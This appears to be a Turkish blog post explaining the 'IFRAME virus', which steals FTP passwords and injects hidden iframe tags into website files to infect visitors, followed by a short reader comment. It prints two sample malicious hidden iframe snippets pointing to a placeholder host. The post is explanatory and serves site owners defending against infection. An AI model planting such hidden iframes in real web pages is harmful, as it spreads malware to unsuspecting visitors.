IFRAME Virüsü Nedir?
Kimi zaman girmek istediğiniz bir site salgırgan site olarak gösterilir ve o siteye girmek sizin için tehlikelidir uyarısını alırsnızı.İşte bu uyarının tek nedeni IFRAME virüsüdür.Bu da demek oluyor ki girmeye çalıştığınız siteye IFRAME virüsü bulaşmıştır.
IFRAME virüsünü temizlemek için tıklayınız…
Bu IFRAME virüsü virüslü bilgisayarlardan FTP girişi yapılan sitelerin index, default ve/veya tüm dosyalara zararlı bir IFRAME kodu yerleştirmektedir. Bu virüs sitenizi ziyaret eden kullanıcılarınızın bilgisayarlarına virüs bulaştırmaktan başka bir amaç gütmemektedir.
Bu IFRAME virüsünün bulaştığı yer genellikle FTP kanalı aracılığı ile olmaktadır.
IFRAME Virüsü Nasıl Bulaşır?
Gel gelelim bu IFRAME virüsünün nasıl bulaştığına…
Bu virüs öncelikle antivirüs yazılımları ile korunmayan bilgisayarları hedef alır.(Kullandığınız antivirüs programının güncelliğine de dikkat edin)
Bu virüs bilgisayarınıza bulaştığı zaman ilk hedef olarak FTP şifrenizi çalmayı amaçlar.Virüs ftp bilgilerinizi çaldıktan sonra, kafasına göre ftp girişi yapıp, sitenizin index.*, default.* veya tüm dosyalarınızın html taglarının arasına (genellikle sayfanın sonuna) iftame veya script tagı yerleştirir.
Bu saldırgan IFRAME tagı sayfanızın html tagları arasında gizlenir. Böylece sayfanızı ziyaret eden kullanıcılarınızın bilgisayarlarına vürüs bulaştırır.
IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından da bulaşabilir. Sitenizdeki dosya ve klasörlerin yazma izinlerinin açık olmasını kullanarak dosyalarınıza bulaşabilir.
IFRAME kod örnekleri:
<IFRAME src=’http://siteadresi/index.php’ style=’border:0px solid gray;’ WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></IFRAME>
echo “<IFRAME src=\”http://siteadresi\123″ width=1 height=1 style=\”visibility:hidden;position:absolute\”></IFRAME>”;
iframe virüsü hakkında bugün güncellediğim makalem http://www.simtoalev.com/iframe-virusu/
başıma gelmişti, index.html 2 adet link eklemişti bayağı kasmıştı beni…